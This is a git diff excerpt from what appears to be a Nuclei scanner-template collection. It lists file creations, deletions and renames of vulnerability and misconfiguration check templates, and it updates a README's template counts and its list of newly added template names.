nuclei-templates/Other/vmware-vcenter-lfi-linux-11042.yaml delete mode 100644 nuclei-templates/Other/vmware-vcenter-lfi-linux-11044.yaml delete mode 100644 nuclei-templates/Other/vmware-version-detect-11054.yaml create mode 100644 nuclei-templates/Other/vmware-version-detect.yaml rename nuclei-templates/Other/{vmware-vrealize-detect.yaml => vmware-vrealize-detect-11057.yaml} (100%) rename nuclei-templates/Other/{vmware-workflow.yaml => vmware-workflow-11060.yaml} (100%) create mode 100644 nuclei-templates/Other/vnc-detect-11062.yaml delete mode 100644 nuclei-templates/Other/vnc-detect.yaml rename nuclei-templates/Other/{voipmonitor-detect.yaml => voipmonitor-detect-11063.yaml} (100%) rename nuclei-templates/Other/{voipmonitor-workflow-11064.yaml => voipmonitor-workflow-11065.yaml} (100%) create mode 100644 nuclei-templates/Other/voyager.yaml delete mode 100644 nuclei-templates/Other/vpms-auth-bypass-11068.yaml create mode 100644 nuclei-templates/Other/vpms-auth-bypass.yaml create 
mode 100644 nuclei-templates/Other/vpn.yaml create mode 100644 nuclei-templates/Other/vrealize-operations-log4j-rce-11072.yaml delete mode 100644 nuclei-templates/Other/vrealize-operations-log4j-rce.yaml create mode 100644 nuclei-templates/Other/vrealize_operations.yaml create mode 100644 nuclei-templates/Other/vrealize_operations_manager.yaml rename nuclei-templates/Other/{vsftpd-detection.yaml => vsftpd-detection-11073.yaml} (100%) create mode 100644 nuclei-templates/Other/w3c-total-cache-ssrf-11080.yaml delete mode 100644 nuclei-templates/Other/w3c-total-cache-ssrf.yaml create mode 100644 nuclei-templates/Other/wadl-api-11084.yaml delete mode 100644 nuclei-templates/Other/wadl-api.yaml create mode 100644 nuclei-templates/Other/wamp-xdebug-detect-11100.yaml delete mode 100644 nuclei-templates/Other/wamp-xdebug-detect-11103.yaml rename nuclei-templates/Other/{wangkang-ngfw-rce.yaml => wangkang-NGFW-rce.yaml} (100%) rename nuclei-templates/Other/{wangkang-ns-asg-rce-1.yaml => wangkang-NS-ASG-rce-1.yaml} (100%) delete mode 100644 nuclei-templates/Other/watchguard-panel-11108.yaml create mode 100644 nuclei-templates/Other/watchguard-panel.yaml rename nuclei-templates/Other/{wazuh-detect.yaml => wazuh-detect-11111.yaml} (100%) delete mode 100644 nuclei-templates/Other/wazuh-panel-11113.yaml create mode 100644 nuclei-templates/Other/wazuh-panel.yaml create mode 100644 nuclei-templates/Other/wazuh.yaml delete mode 100644 nuclei-templates/Other/weatherlink-11115.yaml create mode 100644 nuclei-templates/Other/weatherlink-11117.yaml rename nuclei-templates/Other/{weave-scope-dashboard-detect.yaml => weave-scope-dashboard-detect-11118.yaml} (100%) create mode 100644 nuclei-templates/Other/web-config-11125.yaml delete mode 100644 nuclei-templates/Other/web-config.yaml create mode 100644 nuclei-templates/Other/web-ftp-detect-11136.yaml delete mode 100644 nuclei-templates/Other/web-ftp-detect.yaml create mode 100644 nuclei-templates/Other/web-local-craft-11141.yaml delete mode 
100644 nuclei-templates/Other/web-local-craft.yaml create mode 100644 nuclei-templates/Other/web-suite-detect-11168.yaml delete mode 100644 nuclei-templates/Other/web-suite-detect.yaml create mode 100644 nuclei-templates/Other/webeditors-11129.yaml delete mode 100644 nuclei-templates/Other/webeditors.yaml create mode 100644 nuclei-templates/Other/webex_meetings_online.yaml create mode 100644 nuclei-templates/Other/webflow-takeover-11133.yaml delete mode 100644 nuclei-templates/Other/webflow-takeover.yaml rename nuclei-templates/Other/{weblogic-detect.yaml => weblogic-detect-11143.yaml} (100%) rename nuclei-templates/Other/{weblogic-iiop-detect.yaml => weblogic-iiop-detect-11148.yaml} (100%) create mode 100644 nuclei-templates/Other/weblogic-t3-detect-11153.yaml delete mode 100644 nuclei-templates/Other/weblogic-t3-detect.yaml rename nuclei-templates/Other/{weblogic-weak-login-11155.yaml => weblogic-weak-login-11156.yaml} (100%) create mode 100644 nuclei-templates/Other/webmin-panel-11158.yaml delete mode 100644 nuclei-templates/Other/webmin-panel.yaml create mode 100644 nuclei-templates/Other/webmodule-ee-11162.yaml delete mode 100644 nuclei-templates/Other/webmodule-ee-11164.yaml create mode 100644 nuclei-templates/Other/webmodule-ee-panel-11161.yaml delete mode 100644 nuclei-templates/Other/webmodule-ee-panel.yaml create mode 100644 nuclei-templates/Other/webpagetest.yaml create mode 100644 nuclei-templates/Other/websphere.yaml rename nuclei-templates/Other/{Webtalk-leakage.yaml => webtalk-leakage.yaml} (100%) create mode 100644 nuclei-templates/Other/webui-rce-11173.yaml delete mode 100644 nuclei-templates/Other/webui-rce.yaml rename nuclei-templates/Other/{webview-addjavascript-interface-11175.yaml => webview-addjavascript-interface-11177.yaml} (100%) create mode 100644 nuclei-templates/Other/webview-javascript-11178.yaml delete mode 100644 nuclei-templates/Other/webview-javascript.yaml create mode 100644 nuclei-templates/Other/webview-load-url-11181.yaml 
delete mode 100644 nuclei-templates/Other/webview-load-url-11182.yaml create mode 100644 nuclei-templates/Other/wechat.yaml delete mode 100644 nuclei-templates/Other/weiphp-sql-injection-11190.yaml create mode 100644 nuclei-templates/Other/weiphp-sql-injection.yaml create mode 100644 nuclei-templates/Other/wems-manager-xss-11191.yaml delete mode 100644 nuclei-templates/Other/wems-manager-xss.yaml rename nuclei-templates/Other/{werkzeug-debugger-detect.yaml => werkzeug-debugger-detect-11196.yaml} (100%) create mode 100644 nuclei-templates/Other/whatsup_gold.yaml rename nuclei-templates/Other/{wifisky-default-login-11201.yaml => wifisky-default-login-11204.yaml} (100%) mode change 100755 => 100644 nuclei-templates/Other/wifisky-default-password.yaml rename nuclei-templates/Other/{wildfly-panel.yaml => wildfly-panel-11211.yaml} (100%) create mode 100644 nuclei-templates/Other/window-name-domxss-11213.yaml delete mode 100644 nuclei-templates/Other/window-name-domxss.yaml delete mode 100644 nuclei-templates/Other/windows-lfi-fuzz.yaml rename nuclei-templates/Other/{wishpond-takeover.yaml => wishpond-takeover-11217.yaml} (100%) rename nuclei-templates/Other/{wix-takeover.yaml => wix-takeover-11220.yaml} (100%) create mode 100644 nuclei-templates/Other/wn604.yaml rename nuclei-templates/Other/{wondercms-detect.yaml => wondercms-detect-11222.yaml} (100%) rename nuclei-templates/Other/{wooyun-2015-148227.yaml => wooyun-2015-148227-11227.yaml} (100%) create mode 100644 nuclei-templates/Other/wooyun-path-traversal-11229.yaml delete mode 100644 nuclei-templates/Other/wooyun-path-traversal.yaml delete mode 100644 nuclei-templates/Other/wordpress-LFI.yaml create mode 100644 nuclei-templates/Other/wordpress-accessible-wpconfig-11236.yaml delete mode 100644 nuclei-templates/Other/wordpress-accessible-wpconfig.yaml rename nuclei-templates/Other/{wordpress-affiliatewp-log-11242.yaml => wordpress-affiliatewp-log-11243.yaml} (100%) rename 
nuclei-templates/Other/{wordpress-db-backup-listing-11250.yaml => wordpress-db-backup-listing-11248.yaml} (100%) rename nuclei-templates/Other/{wordpress-debug-log-11259.yaml => wordpress-debug-log-11258.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-directory-listing-11262.yaml delete mode 100644 nuclei-templates/Other/wordpress-directory-listing-11263.yaml create mode 100644 nuclei-templates/Other/wordpress-emails-verification-for-woocommerce-1.yaml rename nuclei-templates/Other/{wordpress-emergency-script.yaml => wordpress-emergency-script-11272.yaml} (100%) rename nuclei-templates/Other/{wordpress-git-config-11278.yaml => wordpress-git-config-11279.yaml} (100%) delete mode 100644 nuclei-templates/Other/wordpress-gotmls-detect-11280.yaml create mode 100644 nuclei-templates/Other/wordpress-gotmls-detect.yaml create mode 100644 nuclei-templates/Other/wordpress-infinitewp-auth-bypass-11285.yaml delete mode 100644 nuclei-templates/Other/wordpress-infinitewp-auth-bypass.yaml delete mode 100644 nuclei-templates/Other/wordpress-installer-log-11290.yaml create mode 100644 nuclei-templates/Other/wordpress-installer-log.yaml create mode 100644 nuclei-templates/Other/wordpress-lfi(1).yaml rename nuclei-templates/Other/{wordpress-login.yaml => wordpress-login-11295.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-plugins-detect-11298.yaml delete mode 100644 nuclei-templates/Other/wordpress-plugins-detect.yaml create mode 100644 nuclei-templates/Other/wordpress-registration-enabled.yaml rename nuclei-templates/Other/{WP_json_caching.yaml => wordpress-rest-dosviacp.yaml} (100%) rename nuclei-templates/Other/{wordpress-rce-simplefilelist.yaml => wordpress-simplefilelist-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/wordpress-takeover-11313.yaml create mode 100644 nuclei-templates/Other/wordpress-takeover.yaml create mode 100644 nuclei-templates/Other/wordpress-tmm-db-migrate-11317.yaml delete mode 100644 
nuclei-templates/Other/wordpress-tmm-db-migrate-11320.yaml delete mode 100644 nuclei-templates/Other/wordpress-updraftplus-pem-key-11328.yaml create mode 100644 nuclei-templates/Other/wordpress-updraftplus-pem-key.yaml rename nuclei-templates/Other/{wordpress-weak-credentials-11336.yaml => wordpress-weak-credentials-11334.yaml} (100%) rename nuclei-templates/Other/{wordpress-woocommerce-listing.yaml => wordpress-woocommerce-listing-11341.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-woocommerce-sqli-11343.yaml delete mode 100644 nuclei-templates/Other/wordpress-woocommerce-sqli.yaml rename nuclei-templates/Other/{woosidebars.yaml => wordpress-woosidebars.yaml} (100%) delete mode 100644 nuclei-templates/Other/wordpress-wordfence-lfi-11349.yaml create mode 100644 nuclei-templates/Other/wordpress-wordfence-lfi-11351.yaml create mode 100644 nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss-11354.yaml delete mode 100644 nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss.yaml create mode 100644 nuclei-templates/Other/wordpress-wordfence-xss-11359.yaml delete mode 100644 nuclei-templates/Other/wordpress-wordfence-xss.yaml rename nuclei-templates/Other/{wordpress-workflow.yaml => wordpress-workflow-11366.yaml} (100%) rename nuclei-templates/Other/{wordpress-wpcourses-info-disclosure.yaml => wordpress-wpcourses-info-disclosure-11367.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-xmlrpc-brute-force.yaml create mode 100644 nuclei-templates/Other/wordpress-zebra-form-xss-11378.yaml delete mode 100644 nuclei-templates/Other/wordpress-zebra-form-xss.yaml create mode 100644 nuclei-templates/Other/worksites-detection-11385.yaml delete mode 100644 nuclei-templates/Other/worksites-detection.yaml rename nuclei-templates/Other/{worksites-takeover.yaml => worksites-takeover-11388.yaml} (100%) create mode 100644 nuclei-templates/Other/wowza-streaming-engine-11399.yaml delete mode 100644 
nuclei-templates/Other/wowza-streaming-engine.yaml delete mode 100644 nuclei-templates/Other/wp-123contactform-plugin-listing-11400.yaml create mode 100644 nuclei-templates/Other/wp-123contactform-plugin-listing.yaml delete mode 100644 nuclei-templates/Other/wp-altair-listing-11405.yaml create mode 100644 nuclei-templates/Other/wp-altair-listing.yaml delete mode 100644 nuclei-templates/Other/wp-ambience-xss-11407.yaml create mode 100644 nuclei-templates/Other/wp-ambience-xss-11410.yaml rename nuclei-templates/Other/{wp-app-log.yaml => wp-app-log-11411.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-arforms-listing-11415.yaml delete mode 100644 nuclei-templates/Other/wp-arforms-listing.yaml rename nuclei-templates/Other/{wp-church-admin-xss-11420.yaml => wp-church-admin-xss-11422.yaml} (100%) rename nuclei-templates/Other/{wp-custom-tables-xss.yaml => wp-custom-tables-xss-11435.yaml} (100%) rename nuclei-templates/Other/{wp-finder-xss.yaml => wp-finder-xss-11448.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-flagem-xss-11451.yaml delete mode 100644 nuclei-templates/Other/wp-flagem-xss.yaml create mode 100644 nuclei-templates/Other/wp-grimag-open-redirect-11460.yaml delete mode 100644 nuclei-templates/Other/wp-grimag-open-redirect.yaml delete mode 100644 nuclei-templates/Other/wp-gtranslate-open-redirect-11466.yaml create mode 100644 nuclei-templates/Other/wp-gtranslate-open-redirect.yaml rename nuclei-templates/Other/{wp-idx-broker-platinum-listing.yaml => wp-idx-broker-platinum-listing-11471.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-install-11473.yaml delete mode 100644 nuclei-templates/Other/wp-install.yaml create mode 100644 nuclei-templates/Other/wp-iwp-client-listing-11476.yaml delete mode 100644 nuclei-templates/Other/wp-iwp-client-listing.yaml create mode 100644 nuclei-templates/Other/wp-knews-xss-11488.yaml delete mode 100644 nuclei-templates/Other/wp-knews-xss.yaml create mode 100644 
nuclei-templates/Other/wp-license-file-11489.yaml delete mode 100644 nuclei-templates/Other/wp-license-file.yaml create mode 100644 nuclei-templates/Other/wp-mailchimp-log-exposure-11494.yaml delete mode 100644 nuclei-templates/Other/wp-mailchimp-log-exposure.yaml create mode 100644 nuclei-templates/Other/wp-memphis-documents-library-lfi-11497.yaml delete mode 100644 nuclei-templates/Other/wp-memphis-documents-library-lfi.yaml create mode 100644 nuclei-templates/Other/wp-misconfig.yaml rename nuclei-templates/Other/{wp-mstore-plugin-listing.yaml => wp-mstore-plugin-listing-11501.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-multiple-theme-ssrf-11511.yaml delete mode 100644 nuclei-templates/Other/wp-multiple-theme-ssrf.yaml create mode 100644 nuclei-templates/Other/wp-nextgen-xss-11517.yaml delete mode 100644 nuclei-templates/Other/wp-nextgen-xss.yaml create mode 100644 nuclei-templates/Other/wp-oxygen-theme-lfi-11521.yaml delete mode 100644 nuclei-templates/Other/wp-oxygen-theme-lfi-11523.yaml create mode 100644 nuclei-templates/Other/wp-phpfreechat-xss-11524.yaml delete mode 100644 nuclei-templates/Other/wp-phpfreechat-xss-11527.yaml rename nuclei-templates/Other/{wp-plugin-1-flashgallery-listing.yaml => wp-plugin-1-flashgallery-listing-11530.yaml} (100%) rename nuclei-templates/Other/{wp-plugin-lifterlms.yaml => wp-plugin-lifterlms-11535.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-prostore-open-redirect-11550.yaml delete mode 100644 nuclei-templates/Other/wp-prostore-open-redirect.yaml create mode 100644 nuclei-templates/Other/wp-securimage-xss-11557.yaml delete mode 100644 nuclei-templates/Other/wp-securimage-xss.yaml delete mode 100644 nuclei-templates/Other/wp-sfwd-lms-listing-11562.yaml create mode 100644 nuclei-templates/Other/wp-sfwd-lms-listing-11565.yaml delete mode 100644 nuclei-templates/Other/wp-simple-fields-lfi-11568.yaml create mode 100644 nuclei-templates/Other/wp-simple-fields-lfi-11571.yaml rename 
nuclei-templates/Other/{wp-slideshow-xss-11576.yaml => wp-slideshow-xss-11574.yaml} (100%) rename nuclei-templates/Other/{wp-socialfit-xss-11582.yaml => wp-socialfit-xss-11581.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-super-forms-11588.yaml create mode 100644 nuclei-templates/Other/wp-super-forms.yaml create mode 100644 nuclei-templates/Other/wp-test-email.yaml rename nuclei-templates/Other/{wp-tutor-lfi-11601.yaml => wp-tutor-lfi-11596.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-upload-data-11604.yaml delete mode 100644 nuclei-templates/Other/wp-upload-data.yaml delete mode 100644 nuclei-templates/Other/wp-userenum.yaml delete mode 100644 nuclei-templates/Other/wp-vault-lfi-11611.yaml create mode 100644 nuclei-templates/Other/wp-vault-lfi-11612.yaml create mode 100644 nuclei-templates/Other/wp-woocommerce-email-verification-11616.yaml delete mode 100644 nuclei-templates/Other/wp-woocommerce-email-verification.yaml rename nuclei-templates/Other/{wp-woocommerce-file-download.yaml => wp-woocommerce-file-download-11620.yaml} (100%) rename nuclei-templates/Other/{wp-xmlrpc-11629.yaml => wp-xmlrpc-11631.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-xmlrpc-brute-force.yaml create mode 100644 nuclei-templates/Other/wp-xmlrpc-pingback-detection-11628.yaml delete mode 100644 nuclei-templates/Other/wp-xmlrpc-pingback-detection.yaml create mode 100644 nuclei-templates/Other/wpconfig.yaml rename nuclei-templates/Other/{wp-engine-config.yaml => wpengine-config-check.yaml} (100%) rename nuclei-templates/Other/{wpmudev-my-calender-xss.yaml => wpmudev-my-calender-xss-11502.yaml} (100%) create mode 100644 nuclei-templates/Other/wpmudev-pub-keys-11504.yaml delete mode 100644 nuclei-templates/Other/wpmudev-pub-keys.yaml delete mode 100644 nuclei-templates/Other/wptouch-open-redirect-11594.yaml create mode 100644 nuclei-templates/Other/wptouch-open-redirect-11595.yaml create mode 100644 nuclei-templates/Other/wptouch-plugin-open-redirect.yaml 
delete mode 100644 nuclei-templates/Other/wsdl-api-11632.yaml create mode 100644 nuclei-templates/Other/wsdl-api.yaml create mode 100644 nuclei-templates/Other/wso2-2019-0598-11635.yaml create mode 100644 nuclei-templates/Other/wso2-management-console-11645.yaml delete mode 100644 nuclei-templates/Other/wso2-management-console.yaml create mode 100644 nuclei-templates/Other/wuzhicms-sqli-11659.yaml delete mode 100644 nuclei-templates/Other/wuzhicms-sqli.yaml create mode 100644 nuclei-templates/Other/x-ui.yaml create mode 100644 nuclei-templates/Other/xampp-default-page-11662.yaml delete mode 100644 nuclei-templates/Other/xampp-default-page-11663.yaml rename nuclei-templates/Other/{xdcms-sqli.yaml => xdcms-sqli-11666.yaml} (100%) create mode 100644 nuclei-templates/Other/xds-amr-status-11669.yaml delete mode 100644 nuclei-templates/Other/xds-amr-status.yaml rename nuclei-templates/Other/{xenforo-login.yaml => xenforo-login-11670.yaml} (100%) delete mode 100644 nuclei-templates/Other/xenmobile-login-11677.yaml create mode 100644 nuclei-templates/Other/xenmobile-login.yaml create mode 100644 nuclei-templates/Other/xenmobile_server.yaml delete mode 100644 nuclei-templates/Other/xerox-efi-lfi-11682.yaml create mode 100644 nuclei-templates/Other/xerox-efi-lfi-11683.yaml create mode 100644 nuclei-templates/Other/xerox7-default-login-11678.yaml delete mode 100644 nuclei-templates/Other/xerox7-default-login.yaml delete mode 100644 nuclei-templates/Other/xml-schema-detect-11691.yaml create mode 100644 nuclei-templates/Other/xml-schema-detect.yaml create mode 100644 nuclei-templates/Other/xnat.yaml rename nuclei-templates/Other/{xp-webcam-11698.yaml => xp-webcam-11697.yaml} (100%) create mode 100644 nuclei-templates/Other/xprober-service-11694.yaml delete mode 100644 nuclei-templates/Other/xprober-service.yaml delete mode 100644 nuclei-templates/Other/xsstest.yaml create mode 100644 nuclei-templates/Other/xvr-login-11704.yaml delete mode 100644 
nuclei-templates/Other/xvr-login.yaml rename nuclei-templates/Other/{xxljob-admin-detect.yaml => xxljob-admin-detect-11708.yaml} (100%) delete mode 100644 nuclei-templates/Other/xxljob-default-login-11711.yaml create mode 100644 nuclei-templates/Other/xxljob-default-login-11714.yaml rename nuclei-templates/Other/{yapi-detect-11720.yaml => yapi-detect-11719.yaml} (100%) rename nuclei-templates/Other/{yapi-rce.yaml => yapi-rce-11724.yaml} (100%) create mode 100644 nuclei-templates/Other/yarn-lock-11728.yaml delete mode 100644 nuclei-templates/Other/yarn-lock.yaml delete mode 100644 nuclei-templates/Other/yarn-manager-exposure-11733.yaml create mode 100644 nuclei-templates/Other/yarn-manager-exposure.yaml delete mode 100644 nuclei-templates/Other/yarn-resourcemanager-rce-11735.yaml create mode 100644 nuclei-templates/Other/yarn-resourcemanager-rce.yaml create mode 100644 nuclei-templates/Other/yeswiki.yaml create mode 100644 nuclei-templates/Other/yii-debugger-11738.yaml delete mode 100644 nuclei-templates/Other/yii-debugger.yaml rename nuclei-templates/Other/{yishaadmin-lfi.yaml => yishaadmin-lfi-11744.yaml} (100%) delete mode 100644 nuclei-templates/Other/yongyou-ICurrtype-sqli.yaml create mode 100644 nuclei-templates/Other/yongyou-jdbcread.yaml rename nuclei-templates/Other/{yonyou-u8-registerservlet-sqli.yaml => yongyou-u8-RegisterServlet-sql-Injection.yaml} (100%) rename nuclei-templates/Other/{yongyou-u8-oa-sqli.yaml => yongyou-u8-oa-sqli-11747.yaml} (100%) rename nuclei-templates/Other/{yonyou-nc-cloud-ncchr-attachment-uploadChunk-fileupload.yaml => yonyou_nc_cloud_ncchr_attachment_uploadchunk_upload.yaml} (100%) rename nuclei-templates/Other/{yopass-panel.yaml => yopass-panel-11749.yaml} (100%) rename nuclei-templates/Other/{yunxintong-fileRead.yaml => yunxintong-fileread.yaml} (100%) delete mode 100644 nuclei-templates/Other/yzmcms-detect-11751.yaml create mode 100644 nuclei-templates/Other/yzmcms-detect.yaml rename 
nuclei-templates/Other/{zabbix-default-login-11762.yaml => zabbix-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/zcms-v3-sqli-11775.yaml delete mode 100644 nuclei-templates/Other/zcms-v3-sqli.yaml create mode 100644 nuclei-templates/Other/zenphoto-installation-sensitive-info-1.yaml create mode 100644 nuclei-templates/Other/zenphoto-installation-sensitive-info-2.yaml create mode 100644 nuclei-templates/Other/zenphoto-installation-sensitive-info-3.yaml create mode 100644 nuclei-templates/Other/zenphoto-installation-sensitive-info-4.yaml rename nuclei-templates/Other/{zentao-detect-11787.yaml => zentao-detect-11785.yaml} (100%) create mode 100644 nuclei-templates/Other/zentao.yaml delete mode 100644 nuclei-templates/Other/zhiyuan-file-upload-11791.yaml create mode 100644 nuclei-templates/Other/zhiyuan-file-upload.yaml create mode 100644 nuclei-templates/Other/zhiyuan-oa-info-leak-11799.yaml delete mode 100644 nuclei-templates/Other/zhiyuan-oa-info-leak.yaml rename nuclei-templates/Other/{zhiyuan-oa-unauthorized-11808.yaml => zhiyuan-oa-unauthorized-11806.yaml} (100%) delete mode 100644 nuclei-templates/Other/zimbra-preauth-ssrf-11811.yaml create mode 100644 nuclei-templates/Other/zimbra-preauth-ssrf.yaml delete mode 100644 nuclei-templates/Other/zip-backup-files-11819.yaml create mode 100644 nuclei-templates/Other/zip-backup-files-11820.yaml delete mode 100644 nuclei-templates/Other/zm-system-log-detect-11833.yaml create mode 100644 nuclei-templates/Other/zm-system-log-detect-11834.yaml create mode 100644 nuclei-templates/Other/zmanda-default-login-11825.yaml delete mode 100644 nuclei-templates/Other/zmanda-default-login.yaml delete mode 100644 nuclei-templates/Other/zms-auth-bypass-11830.yaml create mode 100644 nuclei-templates/Other/zms-auth-bypass.yaml create mode 100644 nuclei-templates/Other/zte-panel-11840.yaml delete mode 100644 nuclei-templates/Other/zte-panel.yaml create mode 100644 nuclei-templates/Other/zuul-panel-11843.yaml delete 
mode 100644 nuclei-templates/Other/zuul-panel.yaml diff --git a/README.md b/README.md index ae70cc2c39..1dfb857ec9 100644 --- a/README.md +++ b/README.md 
@@ -13,40 +13,374 @@
 | CVE-2009 | 45 |
 | CVE-2010 | 139 |
 | CVE-2011 | 91 |
-| CVE-2012 | 145 |
+| CVE-2012 | 146 |
 | CVE-2013 | 169 |
 | CVE-2014 | 422 |
-| CVE-2015 | 527 |
+| CVE-2015 | 528 |
 | CVE-2016 | 249 |
-| CVE-2017 | 395 |
+| CVE-2017 | 397 |
 | CVE-2018 | 446 |
 | CVE-2019 | 514 |
-| CVE-2020 | 594 |
-| CVE-2021 | 1731 |
-| CVE-2022 | 2466 |
-| CVE-2023 | 4756 |
-| CVE-2024 | 4993 |
-| Other | 23918 |
+| CVE-2020 | 593 |
+| CVE-2021 | 1734 |
+| CVE-2022 | 2470 |
+| CVE-2023 | 4759 |
+| CVE-2024 | 5042 |
+| Other | 24279 |
 ## 近几天数量变化情况
-|2024-09-07 | 2024-09-08 | 2024-09-09 | 2024-09-10 | 2024-09-11 | 2024-09-12 | 2024-09-13|
+|2024-09-08 | 2024-09-09 | 2024-09-10 | 2024-09-11 | 2024-09-12 | 2024-09-13 | 2024-09-14|
 |--- | ------ | ------ | ------ | ------ | ------ | ---|
-|41788 | 41796 | 41798 | 41800 | 41825 | 41851 | 41783|
+|41796 | 41798 | 41800 | 41825 | 41851 | 41783 | 42206|
 ## 最近新增文件
 | templates name |
 | --- |
-| cve-2019-17503.yaml |
-| cve-2019-5127.yaml |
-| cve-2018-1000671.yaml |
-| cve-2017-7269.yaml |
-| kubernetes-api-detect.yaml |
-| opengear-detect.yaml |
-| 403-bypass_method.yaml |
-| generic-rfi.yaml |
-| parametros-preguicosos.yaml |
-| exposed-pii.yaml |
-| 403-bypass_xrewriteurl.yaml |
-| 403-bypass_xheaders.yaml |
-| setPreferences-xss.yaml |
-| contact-form-7-plugin.yaml |
-| SquirrelMail.yaml |
-| cve-2020-11547.yaml |
+| CVE-2024-8730.yaml |
+| CVE-2024-7888.yaml |
+| CVE-2024-5870.yaml |
+| CVE-2024-8522.yaml |
+| CVE-2024-3899.yaml |
+| CVE-2024-45625.yaml |
+| CVE-2024-5628.yaml |
+| CVE-2024-8269.yaml |
+| CVE-2024-6792.yaml |
+| CVE-2024-8732.yaml |
+| CVE-2024-6889.yaml |
+| CVE-2024-45270.yaml |
+| CVE-2024-8031.yaml |
+| CVE-2024-7132.yaml |
+| CVE-2024-8663.yaml |
+| CVE-2024-7423.yaml |
+| CVE-2024-6910.yaml |
+| CVE-2024-8622.yaml |
+| CVE-2024-8747.yaml |
+| CVE-2024-6544.yaml |
+| CVE-2024-8734.yaml |
+| CVE-2024-7354.yaml |
+| CVE-2024-8665.yaml |
+| CVE-2024-8664.yaml |
+| CVE-2024-37084.yaml |
+| CVE-2024-8656.yaml |
+| CVE-2024-7955.yaml |
+| CVE-2024-8731.yaml |
+| CVE-2024-6888.yaml |
+| CVE-2024-5867.yaml |
+| CVE-2024-7716.yaml |
+| CVE-2024-45429.yaml |
+| CVE-2024-45269.yaml |
+| CVE-2024-5561.yaml |
+| CVE-2024-41667.yaml |
+| CVE-2024-5789.yaml |
+| CVE-2024-8742.yaml |
+| CVE-2024-7891.yaml |
+| CVE-2024-8242.yaml |
+| CVE-2024-3673.yaml |
+| CVE-2024-8529.yaml |
+| CVE-2024-23167.yaml |
+| CVE-2024-5869.yaml |
+| CVE-2024-5567.yaml |
+| CVE-2024-8714.yaml |
+| CVE-2024-5884.yaml |
+| CVE-2024-6020.yaml |
+| CVE-2024-8737.yaml |
+| CVE-2022-2446.yaml |
+| azure-postgres-log-connections-disabled.yaml |
+| azure-apim-public-access-disabled.yaml |
+| azure-sql-auditing-disabled.yaml |
+| application_security_gateway.yaml |
+| aruba_instant.yaml |
+| jbpm.yaml |
+| leira-roles.yaml |
+| azure-storage-account-update-unalerted.yaml |
+| azure-entra-id-guest-users-unmonitored.yaml |
+| azure-storage-table-logging-disabled.yaml |
+| azure-storage-overly-permissive-sap.yaml |
+| azure-storage-private-endpoint-unconfigured.yaml |
+| azure-keyvault-recoverability-unconfigured.yaml |
+| vrealize_operations_manager.yaml |
+| azure-vm-entra-id-unenabled.yaml |
+| shopxo.yaml |
+| azure-lb-create-update-missing.yaml |
+| fortiportal.yaml |
+| azure-sql-va-emails-unconfigured.yaml |
+| azure-vm-delete-unalerted.yaml |
+| bagisto.yaml |
+| 3cx.yaml |
+| azure-postgres-connection-throttling-disabled.yaml |
+| nifi.yaml |
+| azure-functionapp-public-exposure.yaml |
+| pelco_videoxpert.yaml |
+| azure-postgresql-ssl-enforcement.yaml |
+| azure-storage-queue-logging-disabled.yaml |
+| hg255s.yaml |
+| cloudstack.yaml |
+| s14.yaml |
+| azure-keyvault-network-unrestricted.yaml |
+| office_anywhere.yaml |
+| azure-vm-tags-schema-noncompliant.yaml |
+| seeddms.yaml |
+| azure-aks-kubernetes-version-outdated.yaml |
+| azure-app-tier-vm-disk-unencrypted.yaml |
+| hue.yaml |
+| azure-appservice-auth-disabled.yaml |
+| azure-vm-create-update-unalerted.yaml |
+| azure-vm-deallocate-unalerted.yaml |
+| flexnet_publisher.yaml |
+| azure-redis-nonssl-port-disabled.yaml |
+| azure-lb-unused.yaml |
+| fumengyun-sqli.yaml |
+| azure-diag-logs-not-enabled.yaml |
+| froxlor.yaml |
+| azure-sql-failover-not-enabled.yaml |
+| azure-keyvault-audit-not-enabled.yaml |
+| tooljet.yaml |
+| azure-appservice-always-on-disabled.yaml |
+| azure-vm-ssh-auth-type.yaml |
+| azure-vmss-auto-os-upgrade-missing.yaml |
+| azure-openai-cmk-not-enabled.yaml |
+| steve.yaml |
+| azure-functionapp-access-keys-missing.yaml |
+| wazuh.yaml |
+| xnat.yaml |
+| azure-blob-anonymous-access-disabled.yaml |
+| azure-servicebus-public-access-disabled.yaml |
+| logstash.yaml |
+| azure-blob-soft-delete-disabled.yaml |
+| azure-functionapp-admin-privileges.yaml |
+| kio_firmware.yaml |
+| azure-postgresql-db-delete-unalerted.yaml |
+| azure-custom-admin-role-unrestricted.yaml |
+| azure-delete-lb-alert-unconfigured.yaml |
+| azure-vm-unmanaged-disk-volumes.yaml |
+| data_science_studio.yaml |
+| kiwi_tcms.yaml |
+| azure-vm-managed-identity-unassigned.yaml |
+| vrealize_operations.yaml |
+| vpn.yaml |
+| x-ui.yaml |
+| netman_204_firmware.yaml |
+| azure-public-ip-delete-unalerted.yaml |
+| azure-keyvault-cert-keytype-unapproved.yaml |
+| azure-vm-guest-diagnostics-unenabled.yaml |
+| g0.yaml |
+| azure-vmss-public-ip-disabled.yaml |
+| t24.yaml |
+| azure-vm-standard-ssd-required.yaml |
+| kingsoft_antivirus.yaml |
+| unified_communications_domain_manager.yaml |
+| azure-search-service-managed-identity-disabled.yaml |
+| azure-storage-min-tls-version.yaml |
+| network_security_manager.yaml |
+| ckan.yaml |
+| vcenter_server.yaml |
+| traccar.yaml |
+| dns-320l.yaml |
+| azure-custom-owner-role-unrestricted.yaml |
+| azure-postgresql-db-update-unalerted.yaml |
+| azure-apim-nv-plaintext-exposure.yaml |
+| azure-keyvault-ssl-autorenewal-missing.yaml |
+| email-obfuscate-shortcode.yaml |
+| senayan_library_management_system.yaml |
+| azure-appservice-http2-not-enabled.yaml |
+| azure-db-mysql-delete-unalerted.yaml |
+| azure-postgres-log-duration-disabled.yaml |
+| streampipes.yaml |
+| websphere.yaml |
